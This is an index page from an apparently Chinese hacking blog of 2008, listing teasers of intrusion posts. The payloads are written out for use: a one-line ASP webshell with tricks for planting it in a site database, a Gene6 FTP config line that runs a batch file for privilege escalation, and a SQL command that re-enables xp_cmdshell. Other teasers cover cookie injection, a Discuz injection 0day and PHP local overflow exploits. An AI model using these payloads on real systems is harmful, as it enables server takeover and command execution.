用户登陆
用户:
密码:
 

工具箱
Blog设置 | 收藏夹
    正常模式 | 列表模式
  
  

2008 年 5 月
    123
45678910
11121314151617
18192021222324
25262728293031
上一年下一年   上一月下一月

公告
『穿梭在网络之间』
『纵横于茫茫网海』
『寻找着我的目标和一切』
『打造我的第二生存空间』
『廷续着自己的第二生命』
          『--------蜀山劍客』

  我这几句写得似乎很精辟,盗用的人还不少。^-^



热门日志
一次linux肉鸡入侵检...
Frame Relay:...
他奶奶的居然有人联俺的格...
对dvbbs7.1 sp...
ASP注入命令行参数整理...
内网数据库服务器入侵实战
服务器的问题总算解决了!
Serv-U6.002下...
OBLOG通杀4.0、4...
直接获取access、S...

最新评论
Nice site !;&...
http://www.newrxforum08...
[url=http://www.generat...
[url=http://www.newrxfo...
http://www.newrxforum08...
http://www.newrxforum08...
http://www.geni.com/pro...
[url=http://www.generat...
WOW, so much&...
[url=http://www.shunfen...

站点统计
日志:141 篇
评论:465 篇
留言:1550 篇
引用:1076 个
收藏夹:0 个书签
会员:81 人
访问:1262929 次
在线人数:39 人


点击这里给我发消息
本站LOGO
BLOG编码
RSS 1.0
RSS 2.0
创作共用协议

 首页
1 2 3 4 5 6 7 8 9 10  ... 15
对不起,本日志为隐藏日志,只有管理员或者作者可以查看!
Author:Tr4c3[at]126[dot]CoM
http://www.nspcn.org
http://www.tr4c3.com
谨以此文献给在我老婆不在身边的时候陪我YY,看AV的n37p47ch,King,慕容大雨和BK瞬间群的所有淫棍。
来自:Tr4c3 | 作者:蜀山剑客 | 分类:实战收录 | 评论:0 | 引用:0 | 查看:464
在新窗口打开 COOKIE注入经典原理  [2008-02-20]
大家好,我是初学者,在上一讲中,我们学习了"搜索型注入"的有关知识,今天我们再来学学另一种不常见的注入方法"cookie注入"在讲之前,我们还是来回顾下ASP脚本中Request对象的知识吧,上面几讲中都提到Request对象获取客户端提交数据常用的是GET和POST二种方式,同时request对象可以不通过集合来获得数据,即直接使用"request("name")"但它的效率低下,容易出错,当我们省略具体的集合名称时,ASP是按QueryString,from,cookie,servervariable,集合的顺序来搜索的,在request对象成员中集合cookies,它的意思是"读取用户系统发送的所有cookie值,我们从第二讲关于"cookies欺骗入侵和原理"中知道,cookies是保存在客户端计算机的一个文本文件,可以进行修改,这样一来,我们就可以使用Request.cookie方式来提交变量的值,从而利用系统的漏洞进行注入攻击.

  我们首先还是来看看中网景论坛的最新版本"(CNKBBS2007)中网景论坛2007v5.0 "官方下载地址"http://www.cnetking.com/websys2.asp?id=26"发布时间是2007-06-06,打开系统的源代码后,在"user_RxMsg_detail.asp"文件中,有如下代码:

<!--#include file="opendb.asp" -->  (调用opendb.asp文件)
来自:独自望海 | 作者:蜀山剑客 | 分类:实战收录 | 评论:0 | 引用:0 | 查看:243
突破 ASP数据库 不能插马

<%execute request("value")%><%''<% loop <%:%>
是这样的顺序才行,也可以是以下顺序
<%''<% loop <%:%><%execute request("value")%>
来自: | 作者:蜀山剑客 | 分类:入侵技巧 | 评论:0 | 引用:0 | 查看:6800
By:lake2

已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。

最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access导出asp的方法,分享之。
来自:lake2 | 作者:蜀山剑客 | 分类:入侵技巧 | 评论:24 | 引用:0 | 查看:12331
精企业网站管理系统Sql注入漏洞
Author:Tr4c3[at]126[dot]com
http://www.nspcn.org
http://www.tr4c3.com
涉及版本:良精企业网站管理系统(2007-V09)官方正式商业版
来自:Tr4c3 | 作者:蜀山剑客 | 分类:安全漏洞 | 评论:3 | 引用:0 | 查看:10150
在新窗口打开 Discuz6.0 injection 0day  [2007-08-12]
// 允许程序在 register_globals = off 的环境下工作
$onoff = (function_exists(''ini_get'')) ? ini_get(''register_globals'') : get_cfg_var(''register_globals'');

if ($onoff != 1) {
 @extract($_POST, EXTR_SKIP);
来自:x140le's Blog | 作者:蜀山剑客 | 分类:安全漏洞 | 评论:0 | 引用:0 | 查看:7558
在新窗口打开 Gene6 FTP 提权方法  [2007-08-12]
在任意帐户配置文件中添加SiteCommandList0=-1,TQ1,c:\a.bat,0,60,0,0,jid

TQ1=命令名

c:\a.bat=实际路径
来自:转载 | 作者:蜀山剑客 | 分类:入侵技巧 | 评论:2 | 引用:0 | 查看:7406
乔客(joekoe) CMS 4.0 的2个高危漏洞

 
转载请保留版权标记,谢谢
-------------------------------by 大蝉@http://blog.gsnsg.com/weblog/usual/ QQ:271607603------------------------------------------
来自:大蝉 | 作者:蜀山剑客 | 分类:安全漏洞 | 评论:14 | 引用:0 | 查看:8051
PHP 5.2.3的两个local exploit

1。PHP 5.2.3 Tidy extension Local Buffer Overflow Exploit
2。PHP <= 5.2.3 snmpget() object id Local Buffer Overflow Exploit
来自:x140le's Blog | 作者:蜀山剑客 | 分类:溢出破解 | 评论:0 | 引用:0 | 查看:6103
用下面一句话就可以了解决了。

EXEC sp_configure ''show advanced options'', 1;RECONFIGURE;EXEC sp_configure ''xp_cmdshell'', 1;RECONFIGURE;

关闭一样.只是将上面的后面的那个"1"改成"0"就可以了.
来自:本站原创 | 作者:蜀山剑客 | 分类:入侵技巧 | 评论:0 | 引用:0 | 查看:7098
1 2 3 4 5 6 7 8 9 10  ... 15